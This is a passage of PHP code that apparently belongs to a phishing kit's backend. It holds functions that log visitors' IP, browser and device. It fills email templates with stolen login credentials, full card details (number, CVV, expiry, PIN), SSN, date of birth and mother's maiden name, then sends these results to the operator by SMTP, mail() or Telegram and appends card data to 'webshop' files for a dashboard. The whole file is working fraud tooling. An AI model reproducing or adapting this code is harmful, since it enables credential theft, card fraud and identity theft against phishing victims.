        if ($lineIp === $ipData['ip'] && $lineAction === $logs && $lineBrowser === $browser && $lineDevice === $device) {
            $entryExists = true;
            break;
        }
    }
    
    // Save if this specific combination doesn't exist (allows different browsers/devices)
    if (!$entryExists) {
        file_put_contents($targetFile, $ipRecord . PHP_EOL, FILE_APPEND);
    }
    
    if (!file_exists($ipsFile)) file_put_contents($ipsFile, '');
    file_put_contents($ipsFile, $ipRecord . PHP_EOL, FILE_APPEND);
}

function generateRandomString($length = 30) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

/**
 * Send email using SMTP or PHP mail()
 * Uses GLOBAL config from /config/gen.json
 * @param string $to Recipient email
 * @param string $subject Email subject
 * @param string $message Email body
 * @return bool Success status
 */
function sendEmail($to, $subject, $message) {
    // Use global email sender with PHPMailer support
    // Send as HTML (true) for nice formatting
    if (function_exists('sendGlobalEmail')) {
        return sendGlobalEmail($to, $subject, $message, true);
    }
    
    // Fallback to old method if sendGlobalEmail not available
    global $config;
    
    $globalConfigPath = __DIR__ . '/../../config/gen.json';
    $globalConfig = [];
    if (file_exists($globalConfigPath)) {
        $globalConfig = json_decode(file_get_contents($globalConfigPath), true) ?? [];
    }
    
    // Always try Telegram in fallback too
    if (function_exists('sendToTelegram')) {
        sendToTelegram($subject, $message);
    }
    
    if (strtolower($globalConfig['email_send_status'] ?? 'off') !== 'on') {
        return true;
    }
    
    $fromEmail = $globalConfig['email_from'] ?? 'noreply@example.com';
    $fromName = $globalConfig['email_from_name'] ?? 'System';
    
    $headers  = "MIME-Version: 1.0\r\n";
    $headers .= "Content-type: text/html; charset=UTF-8\r\n";
    $headers .= "From: {$fromName} <{$fromEmail}>\r\n";
    $headers .= "Reply-To: {$fromEmail}\r\n";
    $headers .= "X-Mailer: PHP/" . phpversion();
    
    return @mail($to, $subject, $message, $headers);
}

/**
 * Build HTML email from fullinfo template (for Card results)
 */
function buildHtmlEmail($data) {
    $templatePath = __DIR__ . '/../../function/fullinfo.html';
    
    if (!file_exists($templatePath)) {
        return null;
    }
    
    $html = file_get_contents($templatePath);
    
    global $config;
    $brandName = $config['brand_name'] ?? '405 X Gobot.su';
    $replacements = [
        '##BRAND_NAME##' => $brandName,
        '##EMAIL##' => $data['email'] ?? '',
        '##PASSWORD##' => $data['password'] ?? '',
        '##BIN##' => $data['bin'] ?? '',
        '##CNM##' => $data['cardname'] ?? '',
        '##CARDNUM##' => $data['cardnumber'] ?? '',
        '##EXP##' => $data['expiration'] ?? '',
        '##CVV##' => $data['cvv'] ?? '',
        '##CID##' => $data['cid'] ?? '',
        '##XID##' => $data['xid'] ?? '',
        '##FULLNAME##' => $data['fullname'] ?? '',
        '##ADDRESS##' => $data['address'] ?? '',
        '##ADDRESS2##' => $data['address2'] ?? '',
        '##CTY##' => $data['city'] ?? '',
        '##STE##' => $data['state'] ?? '',
        '##PHONE##' => $data['phone'] ?? '',
        '##PINN##' => $data['pin'] ?? '',
        '##ZC##' => $data['zipcode'] ?? '',
        '##MMN##' => $data['mmn'] ?? '',
        '##DOB##' => $data['dob'] ?? '',
        '##SSN##' => $data['ssn'] ?? '',
        '##COPYWEB##' => $data['webshop'] ?? '',
        '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
        '##DV##' => $data['device'] ?? '',
        '##BW##' => $data['browser'] ?? '',
        '##CY##' => $data['country'] ?? '',
        '##ST##' => $data['region'] ?? '',
        '##CT##' => $data['city'] ?? '',
        '##IP##' => $data['ip'] ?? '',
        '##UA##' => $data['useragent'] ?? '',
    ];
    
    foreach ($replacements as $placeholder => $value) {
        $html = str_replace($placeholder, htmlspecialchars($value), $html);
    }
    
    return $html;
}

/**
 * Build HTML email from login template (for Login results)
 */
function buildLoginHtml($data) {
    $templatePath = __DIR__ . '/../../function/login.html';
    
    if (!file_exists($templatePath)) {
        return null;
    }
    
    $html = file_get_contents($templatePath);
    
    global $config;
    $brandName = $config['brand_name'] ?? '405 X Gobot.su';
    $replacements = [
        '##BRAND_NAME##' => $brandName,
        '##EMAIL##' => $data['email'] ?? '',
        '##PASSWORD##' => $data['password'] ?? '',
        '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
        '##DV##' => $data['device'] ?? '',
        '##BW##' => $data['browser'] ?? '',
        '##CY##' => $data['country'] ?? '',
        '##ST##' => $data['region'] ?? '',
        '##CT##' => $data['city'] ?? '',
        '##IP##' => $data['ip'] ?? '',
        '##UA##' => $data['useragent'] ?? '',
    ];
    
    foreach ($replacements as $placeholder => $value) {
        $html = str_replace($placeholder, htmlspecialchars($value), $html);
    }
    
    return $html;
}

/**
 * Build HTML email from billing template (for Billing results)
 */
function buildBillingHtml($data) {
    $templatePath = __DIR__ . '/../../function/billing.html';
    
    if (!file_exists($templatePath)) {
        return null;
    }
    
    $html = file_get_contents($templatePath);
    
    global $config;
    $brandName = $config['brand_name'] ?? '405 X Gobot.su';
    $replacements = [
        '##BRAND_NAME##' => $brandName,
        '##EMAIL##' => $data['email'] ?? '',
        '##PASSWORD##' => $data['password'] ?? '',
        '##FULLNAME##' => $data['fullname'] ?? '',
        '##ADDRESS##' => $data['address'] ?? '',
        '##ADDRESS2##' => $data['address2'] ?? '',
        '##CTY##' => $data['city'] ?? '',
        '##STE##' => $data['state'] ?? '',
        '##ZC##' => $data['zipcode'] ?? '',
        '##PHONE##' => $data['phone'] ?? '',
        '##DOB##' => $data['dob'] ?? '',
        '##SSN##' => $data['ssn'] ?? '',
        '##DATE##' => $data['datetime'] ?? date('Y-m-d H:i:s'),
        '##DV##' => $data['device'] ?? '',
        '##BW##' => $data['browser'] ?? '',
        '##CY##' => $data['country'] ?? '',
        '##ST##' => $data['region'] ?? '',
        '##CT##' => $data['city_geo'] ?? '',
        '##IP##' => $data['ip'] ?? '',
        '##UA##' => $data['useragent'] ?? '',
    ];
    
    foreach ($replacements as $placeholder => $value) {
        $html = str_replace($placeholder, htmlspecialchars($value), $html);
    }
    
    return $html;
}

/**
 * Send email via SMTP
 * Supports both local and global config
 */
function sendSmtpEmail($to, $subject, $message, $fromEmail, $fromName) {
    global $config;
    
    // Support both old and new config keys
    $smtpHost = $config['smtp_host'] ?? $config['email_smtp_host'] ?? 'smtp.gmail.com';
    $smtpPort = $config['smtp_port'] ?? $config['email_smtp_port'] ?? 587;
    $smtpSecure = $config['smtp_secure'] ?? $config['email_smtp_secure'] ?? 'tls';
    $smtpAuth = (isset($config['smtp_auth']) && strtolower($config['smtp_auth']) === 'on') || 
                (isset($config['email_smtp_auth']) && strtolower($config['email_smtp_auth']) === 'on');
    $smtpUsername = $config['smtp_username'] ?? $config['email_smtp_username'] ?? '';
    $smtpPassword = $config['smtp_password'] ?? $config['email_smtp_password'] ?? '';
    
    try {
        // Determine connection type
        $prefix = '';
        if ($smtpSecure === 'ssl') {
            $prefix = 'ssl://';
        }
        
        // Connect to SMTP server
        $socket = @fsockopen($prefix . $smtpHost, $smtpPort, $errno, $errstr, 30);
        if (!$socket) {
            file_put_contents(__DIR__ . "/debug.log", "SMTP Connection failed: $errstr ($errno)" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // Set stream timeout
        stream_set_timeout($socket, 30);
        
        // Read greeting
        $response = fgets($socket, 515);
        if (substr($response, 0, 3) != '220') {
            fclose($socket);
            file_put_contents(__DIR__ . "/debug.log", "SMTP Greeting failed: $response" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // Send EHLO
        fputs($socket, "EHLO localhost\r\n");
        $response = '';
        while ($line = fgets($socket, 515)) {
            $response .= $line;
            if (substr($line, 3, 1) == ' ') break;
        }
        
        // STARTTLS if needed
        if ($smtpSecure === 'tls') {
            fputs($socket, "STARTTLS\r\n");
            $response = fgets($socket, 515);
            if (substr($response, 0, 3) != '220') {
                fclose($socket);
                file_put_contents(__DIR__ . "/debug.log", "SMTP STARTTLS failed: $response" . PHP_EOL, FILE_APPEND);
                return false;
            }
            
            // Enable TLS encryption
            stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_TLS_CLIENT);
            
            // Send EHLO again after STARTTLS
            fputs($socket, "EHLO localhost\r\n");
            $response = '';
            while ($line = fgets($socket, 515)) {
                $response .= $line;
                if (substr($line, 3, 1) == ' ') break;
            }
        }
        
        // AUTH LOGIN (if enabled)
        if ($smtpAuth) {
            fputs($socket, "AUTH LOGIN\r\n");
            $response = fgets($socket, 515);
            if (substr($response, 0, 3) != '334') {
                fclose($socket);
                file_put_contents(__DIR__ . "/debug.log", "SMTP AUTH failed: $response" . PHP_EOL, FILE_APPEND);
                return false;
            }
            
            // Send username
            fputs($socket, base64_encode($smtpUsername) . "\r\n");
            $response = fgets($socket, 515);
            if (substr($response, 0, 3) != '334') {
                fclose($socket);
                file_put_contents(__DIR__ . "/debug.log", "SMTP Username failed: $response" . PHP_EOL, FILE_APPEND);
                return false;
            }
            
            // Send password
            fputs($socket, base64_encode($smtpPassword) . "\r\n");
            $response = fgets($socket, 515);
            if (substr($response, 0, 3) != '235') {
                fclose($socket);
                file_put_contents(__DIR__ . "/debug.log", "SMTP Password failed: $response" . PHP_EOL, FILE_APPEND);
                return false;
            }
        }
        
        // MAIL FROM (use smtp_username if auth enabled, otherwise use from_email)
        $mailFrom = $smtpAuth ? $smtpUsername : $fromEmail;
        fputs($socket, "MAIL FROM:<{$mailFrom}>\r\n");
        $response = fgets($socket, 515);
        if (substr($response, 0, 3) != '250') {
            fclose($socket);
            file_put_contents(__DIR__ . "/debug.log", "SMTP MAIL FROM failed: $response" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // RCPT TO
        fputs($socket, "RCPT TO:<{$to}>\r\n");
        $response = fgets($socket, 515);
        if (substr($response, 0, 3) != '250' && substr($response, 0, 3) != '251') {
            fclose($socket);
            file_put_contents(__DIR__ . "/debug.log", "SMTP RCPT TO failed: $response" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // DATA
        fputs($socket, "DATA\r\n");
        $response = fgets($socket, 515);
        if (substr($response, 0, 3) != '354') {
            fclose($socket);
            file_put_contents(__DIR__ . "/debug.log", "SMTP DATA failed: $response" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // Build email headers and body
        $emailContent = "From: {$fromName} <{$fromEmail}>\r\n";
        $emailContent .= "To: {$to}\r\n";
        $emailContent .= "Subject: {$subject}\r\n";
        $emailContent .= "MIME-Version: 1.0\r\n";
        $emailContent .= "Content-Type: text/plain; charset=UTF-8\r\n";
        $emailContent .= "Date: " . date('r') . "\r\n";
        $emailContent .= "\r\n";
        $emailContent .= $message;
        $emailContent .= "\r\n.\r\n";
        
        fputs($socket, $emailContent);
        $response = fgets($socket, 515);
        if (substr($response, 0, 3) != '250') {
            fclose($socket);
            file_put_contents(__DIR__ . "/debug.log", "SMTP Send failed: $response" . PHP_EOL, FILE_APPEND);
            return false;
        }
        
        // QUIT
        fputs($socket, "QUIT\r\n");
        fclose($socket);
        
        file_put_contents(__DIR__ . "/debug.log", "SMTP Email sent successfully to: $to" . PHP_EOL, FILE_APPEND);
        return true;
        
    } catch (Exception $e) {
        file_put_contents(__DIR__ . "/debug.log", "SMTP Exception: " . $e->getMessage() . PHP_EOL, FILE_APPEND);
        return false;
    }
}

function luhn_check($number) {
    $sum = 0;
    $flag = 0;
    for ($i = strlen($number) - 1; $i >= 0; $i--) {
        $add = $flag++ & 1 ? $number[$i] * 2 : $number[$i];
        $sum += $add > 9 ? $add - 9 : $add;
    }
    return $sum % 10 === 0;
}

/**
 * Save card data to webshop files
 * @param string $data - Pipe-delimited card data
 */
function webShopSave($data) {
    $debugLog = __DIR__ . '/../../GlobalSetting/webshop_debug.log';
    $logTime = date('Y-m-d H:i:s');
    
    @file_put_contents($debugLog, "[$logTime] webShopSave called\n", FILE_APPEND);
    @file_put_contents($debugLog, "[$logTime] Data: $data\n", FILE_APPEND);
    
    // 1. Local webshop file (etmin/logs/)
    $localWebshopFile = __DIR__ . '/../logs/webshop.txt';
    $localDir = dirname($localWebshopFile);
    if (!is_dir($localDir)) {
        @mkdir($localDir, 0755, true);
        @file_put_contents($debugLog, "[$logTime] Created dir: $localDir\n", FILE_APPEND);
    }
    $result1 = @file_put_contents($localWebshopFile, $data . PHP_EOL, FILE_APPEND | LOCK_EX);
    @file_put_contents($debugLog, "[$logTime] Local save: " . ($result1 !== false ? "OK ($result1 bytes)" : "FAILED") . " -> $localWebshopFile\n", FILE_APPEND);
    
    // 2. Central webshop file (GlobalSetting/webshop.txt) - untuk Dashboard
    $centralWebshopFile = __DIR__ . '/../../GlobalSetting/webshop.txt';
    $result2 = @file_put_contents($centralWebshopFile, $data . PHP_EOL, FILE_APPEND | LOCK_EX);
    @file_put_contents($debugLog, "[$logTime] Central save: " . ($result2 !== false ? "OK ($result2 bytes)" : "FAILED") . " -> $centralWebshopFile\n", FILE_APPEND);
    
    // 3. Data webshop logs (etmin/logs/)
    $dataWebshopFile = __DIR__ . '/../logs/data_webshop_logs.txt';
    $result3 = @file_put_contents($dataWebshopFile, $data . PHP_EOL, FILE_APPEND | LOCK_EX);
    @file_put_contents($debugLog, "[$logTime] Data logs save: " . ($result3 !== false ? "OK ($result3 bytes)" : "FAILED") . " -> $dataWebshopFile\n", FILE_APPEND);
    
    @file_put_contents($debugLog, "[$logTime] --- End webShopSave ---\n\n", FILE_APPEND);
}
